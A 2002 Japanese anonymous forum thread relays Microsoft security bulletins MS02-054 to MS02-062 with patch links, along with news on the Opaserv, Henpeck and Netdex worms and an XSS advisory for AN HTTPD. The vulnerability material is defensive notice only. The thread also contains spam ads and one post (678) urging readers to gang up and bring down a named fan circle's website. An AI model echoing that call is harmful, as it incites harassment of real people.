この脆弱性の詳細については、関連する Technet セキュリティ センターの情報を
参照してください。

必要システム

この修正プログラムは、Windows XP に対して適用されます。

実行するには

コンピュータを再起動してインストールを完了します。
658むむむ ◆dFMUMUMU4w :02/10/03 12:49 ID:MPrKKq3A
■Win98(Plus!)/Me/XPのシステムにバッファオーバーフローのセキュリティホール
(>>656 >>657 とは別)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-054ov.asp

MS02-054 に関する情報
「MS02-054: ファイル展開機能に含まれる未チェックのバッファにより、
コードが実行される (Q323284)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーによりお客様のコンピューター上で任意のプログラムを
実行される可能性があります。

対象となる製品
==============
・ Microsoft Windows 98
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows 98 Second Edition
(Microsoft Plus! 98 をインストールしている環境)
・ Microsoft Windows Millennium Edition
・ Microsoft Windows XP

(続く)
659むむむ ◆dFMUMUMU4w :02/10/03 12:50 ID:MPrKKq3A
>>658 続き
修正プログラム
==============
・ Microsoft Windows 98
(Microsoft Plus! 98 をインストールしている環境)
http://download.microsoft.com/download/win98/Update/25556/W98/JA/329048JPN8.EXE
・ Microsoft Windows 98 Second Edition
(Microsoft Plus! 98 をインストールしている環境)
http://download.microsoft.com/download/win98/Update/25556/W98/JA/329048JPN8.EXE
・ Microsoft Windows Millennium Edition
http://download.microsoft.com/download/winme/Update/25556/WinMe/JA/329048JPNM.EXE
・ Microsoft Windows XP
未チェックのバッファの問題に対する修正は
Windows XP Service Pack 1 以降に含まれています。

Windows XP 日本語版の最新の Service Pack は、
以下の Web サイトから入手できます。
http://www.microsoft.com/japan/windowsxp/pro/downloads/servicepacks/sp1/
なお、個別の修正プログラムは以下の Web サイトから入手できます。
・ Microsoft Windows XP
http://download.microsoft.com/download/whistler/Patch/Q323284/WXP/JA/Q323284_WXP_SP1_x86_JPN.exe
660むむむ ◆dFMUMUMU4w :02/10/03 13:13 ID:MPrKKq3A
>>657 情報出ました。
■Windows98/Me/NT4/2000/XPのヘルプ機能にセキュリティホール(MS02-055)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-055ov.asp

MS02-055 に関する情報
「MS02-055: Windows ヘルプ機能の未チェックのバッファにより、
コードが実行される (Q323255)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、HTML Help ActiceX コントロールに含まれる未チェックの
バッファにより、不正なプログラムが実行される可能性がある問題です。
最悪の場合、悪意のあるユーザーにお客様のコンピューター上で任意の
プログラムが実行される可能性があります。

対象となる製品
===============
・ Microsoft Windows 98
・ Microsoft Windows 98 Second Edition
・ Microsoft Windows Millennium Edition
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP

(続く)
661むむむ ◆dFMUMUMU4w :02/10/03 13:13 ID:MPrKKq3A
>>660 続き

修正プログラム
==============
・ Microsoft Windows 98 and 98 Second Edition
http://download.microsoft.com/download/win98/Patch/24354/W98/JA/323255JPN8.EXE
・ Microsoft Windows Millennium Edition
http://download.microsoft.com/download/winme/Patch/24354/WinMe/JA/323255JPNM.EXE
・ Microsoft Windows NT 4.0
Windows NT 4.0 SP6a の環境にインストールすることができます。
http://download.microsoft.com/download/winntsrv40/Install/Q323255/NT4/EN-US/hhupd.exe
・ Microsoft Windows NT 4.0 Terminal Server Edition
Windows NT 4.0 Terminal Server Edition SP6 の環境に
インストールすることができます。
http://download.microsoft.com/download/winntsrv40/Install/Q323255/NT4/EN-US/hhupd.exe
・ Microsoft Windows 2000
Windows 2000 SP1、または、Windows 2000 SP2 の環境に
インストールすることができます。
http://download.microsoft.com/download/win2000platform/Patch/Q323255/NT5/JA/Q323255_W2K_SP4_X86_JA.exe
・ Microsoft Windows XP
http://download.microsoft.com/download/whistler/Patch/Q323255/WXP/JA/Q323255_WXP_SP2_x86_JPN.exe
662むむむ ◆dFMUMUMU4w :02/10/03 13:15 ID:MPrKKq3A
■Microsoft SQL Serverに新たに4つの脆弱性(MS02-056)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-056ov.asp

MS02-056 に関する情報
「MS02-056: SQL Server 用の累積的な修正プログラム (Q316333)」に関する
要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、以下の製品に影響を及ぼすセキュリティ上の問題を
排除する累積的な修正プログラムです。
さらに、新たに確認された 4 つの脆弱性を排除します。

対象となる製品
==============
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000

(続く)
663むむむ ◆dFMUMUMU4w :02/10/03 13:16 ID:MPrKKq3A
>>662 続き

修正プログラム
==============
・ Microsoft SQL Server 7.0、 Microsoft Desktop Engine (MSDE) 1.0
Microsoft SQL Server 7.0 Service Pack 4 の環境に
インストールすることが可能です。
http://download.microsoft.com/download/sql70/Patch/7.00.1077/WIN98MeXP/JA/7.00.1077_jpn.exe
・ Microsoft SQL Server 2000、 Microsoft Desktop Engine (MSDE) 2000
Microsoft SQL 2000 Service Pack 2 の環境に
インストールすることが可能です。
http://download.microsoft.com/download/SQLSVR2000/Patch/8.00.0679/W98NT42KMeXP/JA/8.00.0679_jpn.exe
664;lk:02/10/03 15:27 ID:jDpVxv8P
■■ 出会いサイト開業システムレンタル ■■

儲かる出会い系ビジネス

月収100万円オーバー!!

HP作成できない初心者でも安心して運営

出会いサイトシステムをサーバーごとレンタルします

運営者様には無料で宣伝ソフトもお付けします


http://pink7.net/linkstaff/cgi/click.cgi?id=10001



@
665むむむ ◆dFMUMUMU4w :02/10/04 00:14 ID:jF/l+QNF
>>658-659 と同じセキュリティホールが他のソフトウェアにも存在

http://www.rapid7.com/advisories/R7-0004.txt によると、上記>>658-659
同種のセキュリティホールが、以下のソフトウェアにも存在する模様。

KNOWN VULNERABLE:
o Lotus Notes R4
o Lotus Notes R5
o Lotus Notes R6 (pre-gold)
o Verity, Inc. KeyView viewing SDK
o Aladdin Systems Stuffit Expander (pre 7.0)

これらは問題ない模様。

Apparently NOT VULNERABLE:
o WinRAR is believed to be NOT vulnerable
o WinZip 8.x is believed to be NOT vulnerable
o zlib is believed to be NOT vulnerable
666むむむ ◆dFMUMUMU4w :02/10/04 03:27 ID:jF/l+QNF
■ネットワーク共有でバグベア上回る感染速度 オパサーブ(毎日DIGITAL TODAY)

 アンチウイルスソフト各社は、ワーム「Opaserv(オパサーブ)」または「OPASOFT
(オパソフト)」の感染が広がっているとして、警戒を呼びかけている。オパサーブは、
30日に発見されたネットワーク共有で感染を広げるタイプのワームだが、感染の
ペースが速いのが特徴となっている。

 シマンテックには3日13時現在で日本国内から41件の被害報告が寄せられている。
また、トレンドマイクロ社には、3日20時15分現在で139件が寄せられている。
いずれも、30日に発見されたワーム「バグベア」の同時点での報告件数を
上回っている。

 オパサーブは、ネットワークを検索し、共有されたドライブがあればその上に
自分自身のコピーを作成して、感染を広げる。感染すると、ネットワーク内の
コンピュータ名とドメイン名を特定サイトに送信したり、このサイトからアップデートを
ダウンロードしようとする。ワームは、この特定のサイトにアクセスしたユーザー
から広がったとみられるが、サイトは現在閉鎖されている。
(以上、2002年10月4日の毎日インタラクティブより一部引用―全文は引用元を参照)

引用元: http://www.mainichi.co.jp/digital/network/archive/200210/03/2.html

667名無しさん@お腹いっぱい。:02/10/04 04:18 ID:???
http://cgi.tripod.co.jp/hana66/cgi-bin/fvote.cgi
・激烈度調査 帰ってきたキッツイ子特集!
       一番きつい子アンケートです。
       人気の子は特集組みます。
       どうか投票お願いします。
668むむむ ◆dFMUMUMU4w :02/10/04 13:27 ID:hdqqM6Ym
■Services for Unix 3.0のSunRPC由来のコードにセキュリティホール(MS02-057)

MS02-057 に関する情報
「MS02-057: Services for Unix 3.0 に含まれる Interix SDK の問題によりコードが
実行される (Q329209)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
この問題は、Services for UNIX (SFU) 3.0 の Interix SDK に含まれる Sun RPC
Library に関する 3 つの脆弱性により、不正なプログラムが実行される可能性が
あります。最悪の場合、悪意のあるユーザーによりお客様のコンピュータ上で任意の
プログラムを実行される可能性があります。

対象となる製品
Microsoft Windows NT 4.0
Microsoft Windows 2000
Microsoft Windows XP

注意: Services for UNIX (SFU) 3.0 (英語版製品のみが提供されております。
そのため、日本語版修正プログラムはございません) の Sun RPC Library を含む
Interix SDK をインストールした環境、または、Interix SDK を利用して作成された
アプリケーションがインストールされているコンピュータは、修正プログラムを適用
してください。

現在ダウンロードできる日本語ベータ版 Services for UNIX 3.0 および、リリースを
予定の日本語版 Services for UNIX 3.0 では、この問題が修正されております。

修正プログラム
Microsoft Services for Unix 3.0
http://download.microsoft.com/download/winntunx/Patch/3.0/NT45XP/EN-US/q329209_sfu_3_x86_en.exe
669名無しさん@お腹いっぱい。:02/10/04 14:21 ID:boAK7hdU
国際電話の請求って、NTTの電話料金と一緒にくるの?
それとも別に請求書が送られてくるの?
670名無しさん@お腹いっぱい。:02/10/04 18:17 ID:???
>>669
ここ質問スレじゃないよ
671名無しさん@お腹いっぱい。:02/10/05 12:20 ID:???
>669
初心者板に逝け。
672名無しさん@お腹いっぱい。:02/10/07 10:18 ID:4marOLHU
ge
673名無しさん@お腹いっぱい。:02/10/07 22:33 ID:???
ウィルス頑張れ。
674名無しさん@お腹いっぱい。:02/10/08 02:35 ID:???
ウィルスなんぞ応援する椰子はな、アタマぶっつぶされても
文句言えねえんだよ。わかってんのか。ああ?
     ∧         ∧          ∧
      / ヽ      / ヽ_       / .∧
    /   `、___/   `、⌒ヾ⌒ヽ/  ∧
  /        /    (.....ノ(....ノ   / ヽ
 .l::::ノ(        |   ι      ι::(....ノノ
 |:::::⌒ -=・=-  / ̄ ̄ヽ      ::::::::::::::/`ヽ
 .|:::::::::::::::::  \_(___..ノ     :::::::::::::::::::(....ノノ>>673
  ヽ:::::::::::::::::::  \/ヽ   ι ::::::::::::::::::::::::::ノ
は、はい・・・ぃ・・・
675名無しさん@お腹いっぱい。:02/10/08 21:57 ID:???
        ∧         ∧
     /   `、___/     、⌒ヾ⌒ヽ
    /            \ ( (.....ノ(....ノ / ヽ
    l:::::::::              |   丿 丿(....ノノ
   |:::::U::::: < ・>  <・/ ̄ ̄ヽ     /`ヽ
   .|:::::::::::::::::  \__/ .(___ノ 彡  (....ノノ
    ヽ::::::::::::U::::::: \/    人    サッ :ノ

          アレ、?

              ∧
    / ̄ ̄ ̄ ̄ヽ / ヽ 、⌒ヾ⌒\
  /  / ̄\   /   `、(.....ノ(....ノ \
 /   /  \  ヽ/  u        / ヽ
 |  /  (・)   l:::::::::        u .:(....ノノ  ニギニギ…
 |  |      / ̄ ̄ヽ:::< ・>  < ・> ./`ヽ <イエそんなつもりじゃ、、、
 |  |    __(___..ノ:::  \__/ u  (....ノノ >>674
 |  |    \__ヽ::::::::::::U::::::: \/     ノ
 ゝ‐イ\.   ・   /ノ

  おい、テメーコノスレはセキュリティー情報スレだろなに、
                無意味なAA貼ってんだテメー  なめんじゃねーぞ
676名無しさん@お腹いっぱい。:02/10/08 23:19 ID:???
>>675 オマエもやめれ。
677名無しさん@お腹いっぱい。:02/10/09 16:44 ID:ZMel/QOm
Windows Shell の未チェックのバッファにより、コードが実行される (MS02-014)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-014.asp
> * 2002/10/9: この問題に対する Windows NT 4.0 Terminal Server Edition の日本語版修正プログラムを公開しました。

678名無しさん@お腹いっぱい。:02/10/09 16:58 ID:WzJq+mFs
最悪な同人サクール
2ちゃんねるを否定する最低の同人サークル
「スタジオた〜」
あろうことか、トップページに
「 2 ち ゃ ん ね ら ー の 
  入 場 を 禁 止 し ま す 」
とまで書いてる最低のサークル。
おまけに掲示板では
「2ちゃんねらーは頭が悪い気違いばっか」
という暴言まで吐く始末。
もう我慢できません
メインジャンルはデジモン・おジャ魔女
絵が上手いからまたムカツクんだけどナ^
みんなの力でこのサイトに潰しをかけよう!!

ttp://www.d4.dion.ne.jp/~tar_tar/
679名無しさん@お腹いっぱい。:02/10/10 00:12 ID:???
セキュリティ大切。たかぎひろみつばんざい。
680名無しさん@お腹いっぱい。:02/10/10 04:27 ID:xmv4TSQg
>>678
ネットウォッチのスレに書き込めばよろし

デジモンって昔流行ったなぁ。1と2しか買っていないが。
681432:02/10/10 14:53 ID:kRKQgvfu
■■ 出会いサイト開業システムレンタル ■■

儲かる出会い系ビジネス

月収100万円オーバー!!

HP作成できない初心者でも安心して運営

出会いサイトシステムをサーバーごとレンタルします

運営者様には無料で宣伝ソフトもお付けします

http://pink7.net/open/110.html



@
682名無しさん@お腹いっぱい。:02/10/10 16:41 ID:LFOoUym8
683名無しさん@お腹いっぱい。:02/10/10 16:46 ID:???
>>682
スレ違いsage
684むむむ ◆dFMUMUMU4w :02/10/11 11:34 ID:iBYMGi78
>>658 の MS02-054 が更新されたかもしれません。詳細は判明次第ここにでも。
685むむむ ◆dFMUMUMU4w :02/10/11 11:37 ID:iBYMGi78
■Outlook Expressに任意のプログラムを実行可能な脆弱性(MS02-058)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-058ov.asp

MS02-058 に関する情報
「MS02-058: Outlook Express の S/MIME 解析の未チェックのバッファにより
システムが侵害される(Q328676)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記製品の S/MIME コントロールに含まれる未チェックの
バッファにより、不正なプログラムが実行される可能性がある問題です。
最悪の場合、悪意のあるユーザーにお客様のコンピューター上で任意の
プログラムが実行される可能性があります。

対象となる製品
==============
・ Microsoft Outlook Express 6
・ Microsoft Outlook Express 5.5

修正プログラム
==============
・ Microsoft Outlook Express 6
http://download.microsoft.com/download/IE60/oepac_29/6/W98NT42KMeXP/JA/q328676.exe
・ Microsoft Outlook Express 5.5
http://download.microsoft.com/download/ie55sp2/oepac_29/5.5_sp2/W98NT42KMe/JA/q328389.exe

備考: Outlook Express 5.5 用の修正プログラムのファイル名は、
本セキュリティ情報の文書番号 (Q328676) とは異なっています。
686むむむ ◆dFMUMUMU4w :02/10/11 11:42 ID:iBYMGi78
>>685
備考
Internet Explorer 6 SP1 に含まれている Outlook Express 6 には、この修正が
含まれてます。

ということで、IE6 SP1の人はこのパッチは当てなくていい模様。
687名無しさん@お腹いっぱい。:02/10/13 14:01 ID:vkgUnj+h
www.pcworld.com/news/article/0,aid,104940,00.asp
これ気になるなあ。
688名無しさん@お腹いっぱい。:02/10/14 23:35 ID:???
>>687
そのサイト面白いね。情報サンクス
689むむむ ◆dFMUMUMU4w :02/10/15 01:23 ID:JWwpUBF+
■MS02-046(>>426で既報)が更新
パッチ適用後にファイルの削除の必要あり。

最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-046.asp
(中略)
注意: この修正プログラムの適用後に、いくつかファイルを削除する必要が
あります。詳細は、JP327521 のインストール情報をご覧ください。
http://support.microsoft.com/default.aspx?scid=kb;ja;JP327521

(上記URLより一部引用)
システムに残された Connect.asp ファイルは、ある種の受動攻撃に悪用される
可能性があるため、削除することを強くお勧めいたします。
この問題は、Windows XP Service Pack 1 を適用することでも解決します。

690むむむ ◆dFMUMUMU4w :02/10/15 17:21 ID:NaPya116
■MSN Messengerで感染するワーム"Henpeck"

 Microsoftのインスタントメッセージングソフト「MSN Messenger」経由で感染する
ワーム「Henpeck」について、ウイルス対策ソフトメーカー各社が10月10日警告を
発した。

 HenpeckはMSN Messengerのネットワークを利用して、オンライン上に置かれた
悪質なファイル「BR2002.exe」へのリンクを含んだメッセージを送りつける。この
リンクをクリックするとファイルがダウンロードされ、知らないうちにプログラムが
稼動。友達リストに登録された全員に宛てて、同様のインスタントメッセージを
送りつける。

 ウイルス対策ソフトメーカーのTrend MicroはHenpeckについて、「メッセージを
受け取っても自動的にこのワームに感染するわけではない。受け取った側がURLを
クリックするとワームをダウンロードし、システム内部で実行される」との情報を掲載
している。

 問題のファイルは現在このURLから外されているため、ワームの感染拡大は
防がれている。ただ、既に感染してしまったコンピュータは“裏口”を作り出す
プログラム「BKDR_EVILBOT.A」がインストールされている可能性があり、ここから
サービス拒否攻撃を仕掛ける拠点とされる恐れもある。
(以上、2002年10月15日のZDNet JAPANより一部引用―全文は引用元を参照)

引用元: http://www.zdnet.co.jp/news/0210/12/nebt_03.html
691むむむ ◆dFMUMUMU4w :02/10/17 11:11 ID:4Y6ecmit
■Word/Excelにセキュリティホール、データ漏洩の可能性(MS02-059)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-059ov.asp

MS02-059 に関する情報
「MS02-059: Word フィールドおよび Excel の外部データ更新の問題により、
情報が漏えいされる (Q330008)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記製品のフィールド コードまたは外部データ更新機能により、
意図しない情報が外部に漏えいされる可能性があります。 最悪の場合、重要な
情報の漏えい、または、プライバシーが侵害される可能性があります。

対象となる製品
==============
・Microsoft Word 2002
・Microsoft Word 2000
・Microsoft Word 97
・Microsoft Word 98(日本語版のみ)
・Microsoft Word v.X for Macintosh
・Microsoft Word 2001 for Macintosh
・Microsoft Word 98 for Macintosh
・Microsoft Excel 2002

(続く)
692むむむ ◆dFMUMUMU4w :02/10/17 11:11 ID:4Y6ecmit
>>691 続き

修正プログラム
==============
・Microsoft Word 2002
http://download.microsoft.com/download/Word2002/Update/Wrd1005/W98NT42KMeXP/JA/Wrd1005.exe
・Microsoft Word 2000
http://download.microsoft.com/download/word2000/Update/Wrd0902/WIN98MeXP/JA/Wrd0902.exe
・Microsoft Excel 2002
http://download.microsoft.com/download/Excel2002/Update/EXC1003/W98NT42KMeXP/JA/EXC1003.exe

以下の製品の問題を修正するプログラムは現在準備中です。公開され次第、
このページでご案内します。

・Microsoft Word 97
・Microsoft Word 98(J)
・Microsoft Word v.X for Macintosh
・Microsoft Word 2001 for Macintosh
・Microsoft Word 98 for Macintosh
693むむむ ◆dFMUMUMU4w :02/10/17 11:12 ID:4Y6ecmit
■Windows XP「ヘルプとサポートセンター」に脆弱性、SP1では適用済(MS02-060)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-060ov.asp

MS02-060 に関する情報

「MS02-060: Windows XP 「ヘルプとサポート センター」 の問題により
ファイルが削除される (Q328940)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品の「ヘルプとサポートセンター」機能の
問題により、任意のファイルが削除される可能性がある問題です。
最悪の場合、悪意のあるユーザーによりお客様のコンピューター上で任意の
ファイルが削除される可能性があります。

対象となる製品
==============
・ Microsoft Windows XP

修正プログラム
==============
・ Microsoft Windows XP
http://download.microsoft.com/download/whistler/Patch/Q328940/WXP/JA/Q328940_WXP_SP1_x86_JPN.exe

この修正プログラムは Windows XP SP1 に含まれております。
694むむむ ◆dFMUMUMU4w :02/10/17 11:15 ID:4Y6ecmit
■SQL Serverに管理者権限を奪われる脆弱性(MS02-061)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-061ov.asp

MS02-061 に関する情報
「MS02-061: SQL Server Web タスクで権限が昇格する (Q316333)」に関する
要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる Web タスクに関する
Transact-SQL ストアド プロシージャが悪用されることにより、本来権限の
与えられていないユーザーであるにも関わらず、Web タスクを実行、削除、
挿入、変更が行われる可能性があるものです。最悪の場合、権限の低い
ユーザーを踏み台とし、データベースシステムへの不正なアクセスが
行われることで情報の漏洩や改ざんなどの被害を受ける可能性があります。

対象となる製品
==============
・ Microsoft SQL Server 7.0
・ Microsoft Desktop Engine (MSDE) 1.0
・ Microsoft SQL Server 2000
・ Microsoft Desktop Engine (MSDE) 2000

(続く)
695むむむ ◆dFMUMUMU4w :02/10/17 11:15 ID:4Y6ecmit
>>694 続き

修正プログラム
==============
・ Microsoft SQL Server 7.0、 Microsoft Desktop Engine (MSDE) 1.0
http://download.microsoft.com/download/sql70/Patch/7.00.1078/WIN98MeXP/JA/7.00.1078_jpn.exe
Microsoft SQL Server 7.0 Service Pack 4 の環境に
インストールすることが可能です。
・ Microsoft SQL Server 2000、 Microsoft Desktop Engine (MSDE) 2000
http://download.microsoft.com/download/SQLSVR2000/Patch/8.00.0686/W98NT42KMeXP/JA/8.00.0686_jpn.exe
Microsoft SQL 2000 Service Pack 2 の環境にインストールすることが
可能です。

注意: Microsoft Windows NT Server 4.0 Service Pack 6a を
実行している場合、この問題に対する修正プログラムを適用する前に
サポート技術情報 Q258437 (英語情報) で説明されている
修正プログラムを適用する必要があります。Q258437 の
修正プログラムは現在ダウンロード センターから入手可能です。
詳細についてはサポート技術情報をご覧ください。
696むむむ ◆dFMUMUMU4w :02/10/18 04:43 ID:AsCC66BL
■Webサイトを開くだけでトロイの木馬が送り込まれる「ウィルスサイト」
MS00-075の脆弱性を利用

 ロシアのKasperskyは16日、ウィルス作者が開設したWebサイトを訪問するだけで
トロイの木馬を送り込まれ、自分のマシンが自在に操作されてしまう新種のウィルス
「Netdex」を発見したと報告した。幸いにして今のところ実害はほとんど出ていないが、
今後のウィルスに対処するため、危険なWebサイトへどのように誘導されるかを知識
として知り、教訓を得る必要がある。また、公表されているセキュリティーホールに
対応したパッチをすべてインストールするなど早急に対策をとる必要がある。

 Netdexは、複数のコンポーネントに分かれた一連のプログラムだ。ウィルス作者が
開設したロシアドメインのWebサイトには、JavaScriptで記述されたスクリプトが組み
込まれており、Internet Explorer4.x/5.xに存在するMicrosoft VMのセキュリティー
ホール(MS00-075)を使って、Webサイトを開くと同時にトロイの木馬をマシンに送り
込む。トロイの木馬はバックドアを開き、1分おきにそのWebサイトからの指令を
受け取り、マシン内部にファイルの作成、削除、コピーを行なう。また、利用者に
成り代わってメールを送信したり、システムメッセージを表示するなど、マシンを
乗っ取ることが可能だ。
(以上、2002年10月18日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/internet/www/article/2002/1017/netdex.htm
Kaspersky: http://www.kaspersky.com/news.html?id=963317

697むむむ ◆dFMUMUMU4w :02/10/18 04:45 ID:AsCC66BL
◆【WPC EXPO 2002速報】
  セキュリティ・スタジアム2002でOSのデフォルト設定の怖さを見せつける

 2002年10月16日,WPC EXPO 2002内で開催している「セキュリティ・スタジアム
2002」において,セキュリティ競技の成果が公表された。セキュリティ・スタジアム
2002は,セキュリティの怖さと対策の必要性を訴求するためのセキュリティ・イベン
トで,10月16〜19日の4日間,仮想的なセキュリティの競技を繰り広げる。この競技
では,有効な防御策や深刻なセキュリティ・ホールを実地に検証し,その成果を毎日
公表する。2002年10月16日に報告された成果は二つ。

続き(全文)は,
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20021017/7/
でお読みいただけます。
698名無しさん@お腹いっぱい。:02/10/19 09:19 ID:???
おつかれ。
699名無しさん@お腹いっぱい。:02/10/20 08:43 ID:???
保守
7000. 3 ◆zwz500/rp. :02/10/20 15:26 ID:vrRqrZXm
700げと
701名無しさん@お腹いっぱい。:02/10/22 02:39 ID:???
保守
702名無しさん@お腹いっぱい。:02/10/23 21:38 ID:G17KdQPz
IEに9つの脆弱性――イスラエル企業が「辛抱しきれず」警告
http://www.zdnet.co.jp/news/0210/23/ne00_ie.html
703名無しさん@お腹いっぱい。:02/10/23 22:25 ID:6rouvIDT
>>むむむ
WinXPだけどSP1入れとけば大丈夫みたいだね。
704名無しさん@お腹いっぱい。:02/10/23 22:45 ID:G17KdQPz
>>702
http://www.watch.impress.co.jp/internet/www/article/2002/1023/iesech.htm
> GreyMagicによると、このセキュリティーホールはIE5.5と6.0に存在している。
> それ以前のバージョンでは、IE5の場合「Service Pack 2」(SP2)を
> インストールすることによって9つのセキュリティーホールすべてを塞ぐことができる。
> IE6については、SP1をインストールすることで9つのセキュリティーホールのうち7つを
> 塞ぐことができるが、2つのセキュリティーホールはそれでも塞げない。
> また、IE5.5 SP2とIE6には9つのセキュリティーホール全てが存在しており、
> 何らかの対策が必要である。この場合、Microsoftがパッチを発表するまでの間
> セキュリティーホールを悪用されないために「アクティブスクリプト」を
> オフにすることをGreyMagicでは推奨している。
705名無しさん@お腹いっぱい。:02/10/23 23:39 ID:???
むむむ?
706名無しさん@お腹いっぱい。:02/10/24 00:50 ID:???
むむむ!
707名無しさん@お腹いっぱい。:02/10/25 22:45 ID:???
保護
708名無しさん@お腹いっぱい。:02/10/26 04:36 ID:???
 
709名無しさん@お腹いっぱい。:02/10/26 15:33 ID:???
長期出張?
710名無しさん@お腹いっぱい。:02/10/26 16:12 ID:???
今はニュー+に傾注してでしょ。
711名無しさん@お腹いっぱい。:02/10/26 16:13 ID:???
む・・・むぅ・・・・・・むッ・・・・!
712むむむ ◆dFMUMUMU4w :02/10/27 00:22 ID:???
>>709 >>710
脆弱性ネタがないか、あってもWindows版じゃないか、
日本ではあまり広まってないソフトなので見送ってるとか、
あるいは単にヴぉけてて情報を見落としてるだけとか(汗。

で、ここに情報がどんどん出てくるのがいいのか悪いのかは議論の余地ありかも(w。

# 何にせよ平常時にはここは1日に1度は見てますです。
713インターネットエクスプロアーやめたらハッカーが減った!:02/10/28 21:28 ID:zaTW6Ahk
インターネットエクスプロアーを使っている間、1分に一回以上は、
ハッカーにおそわれていた。

最近、Mozilla に変えたら、ハッカーにおそわれる回数がとても減った。
Mozilla は次からダウンロードできる。

http://www.mozilla.org/

714むむむ ◆MUMUMUkopk :02/10/28 23:37 ID:???
概要:
-----
Windows 95/98/Me/NT/2000 用の HTTP サーバである AN HTTPD のバージョン
1.41d には、クロスサイトスクリプティングを発生させてしまう可能性のあ
る問題が含まれています。

問題:
-----
AN HTTPD は、クライアントからの HTTP リクエスト中の URI に ":" が含
まれている場合にエラーページを表示します。このエラーページ中には、リ
クエスト URI が適切にサニタイズされずに挿入されているため、クロスサ
イトスクリプティングの問題を発生させてしまう可能性があります。

問題を確認したバージョン:
-------------------------
AN HTTPD 1.41d

問題を確認した OS:
------------------
Windows 2000 Server + SP3

(続く)
715むむむ ◆MUMUMUkopk :02/10/28 23:38 ID:???
>>714 続き
対策:
-----
AN HTTPD 1.41e へアップグレードを行うことでこの問題を解消することが
できます。
AN HTTPD 1.41e
http://www.st.rim.or.jp/~nakata/httpd141e.exe

発見者:
-------
山崎 圭吾

謝辞:
-----
中田昭雄氏

免責:
-----
このアドバイザリで示される情報は予告なしに改定されることがあり、かつ、あ
るがままの形で提供されます。この情報を適用し生起される結果のリスクは利用
者が負うものとし、株式会社ラックは一切の責任を負わないものとします。

再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/57.html
716名無しさん@お腹いっぱい。:02/10/29 18:55 ID:???
インターネットエクスプロアーってなんだろう・・・
717名無しさん@お腹いっぱい。:02/10/29 20:29 ID:???
>716
そっとしとけ
718誰か訳して:02/10/30 00:08 ID:???
719名無しさん@お腹いっぱい。:02/10/30 21:16 ID:???
セキュリティとは無関係だということぐらいは読みとれよ。
720むむむ ◆MUMUMUkopk :02/10/31 15:43 ID:???
■Microsoft IISに新たな4つのセキュリティホール、パッチが公開(MS02-062)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-062ov.asp

MS02-062 に関する情報
「MS02-062: Internet Information Services 用の累積的な修正プログラム
(Q327696) 」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、Internet Information Server 4.0 (IIS4.0) または
Internet Information Services 5.0/5.1 (IIS5.0/5.1) に影響を及ぼす、
セキュリティ上の問題を排除する累積的な修正プログラムです。
以前に公開された MS02-028 : HTR のチャンクされたエンコードの
ヒープ オーバーランにより Web サーバーのセキュリティが侵害される
(Q321599)」で修正された問題に加えて、新たに発見された 4 つの問題を
排除します。

(続く)
721むむむ ◆MUMUMUkopk :02/10/31 15:43 ID:???
>>720 続き

対象となる製品
==============
・ Microsoft Internet Information Server 4.0
・ Microsoft Internet Information Services 5.0
・ Microsoft Internet Information Services 5.1

修正プログラム
==============
・ Internet Information Server 4.0 (Windows NT4.0)
http://download.microsoft.com/download/winntsp/Patch/Q327696/NT4/JA/Q327696I.EXE
Windows NT 4.0 SP6a の環境にインストールすることができます。

・ Internet Information Services 5.0 (Windows 2000)
・ PC/AT 互換機
http://download.microsoft.com/download/win2000platform/Patch/Q327696/NT5/JA/Q327696_W2K_SP4_X86_JA.exe
・ NEC PC-9800 シリーズ
http://download.microsoft.com/download/win2000platform/PatchNEC/Q327696/NT5/JA/Q327696_W2K_SP4_nec98_JA.exe
Windows 2000 SP2 または Windows 2000 SP3 の環境に
インストールすることができます。

・ Internet Information Services 5.1 (Windows XP Professional)
・ Microsoft Windows XP
http://download.microsoft.com/download/whistler/Patch/Q327696/WXP/JA/Q327696_WXP_SP2_x86_JPN.exe
・ Microsoft Windows XP 64 bit Edition
http://download.microsoft.com/download/whistler/Patch/Q327696/W64XP/JA/Q327696_WXP_SP2_ia64_JPN.exe
Windows XP または Windows XP SP1 の環境に
インストールすることができます。
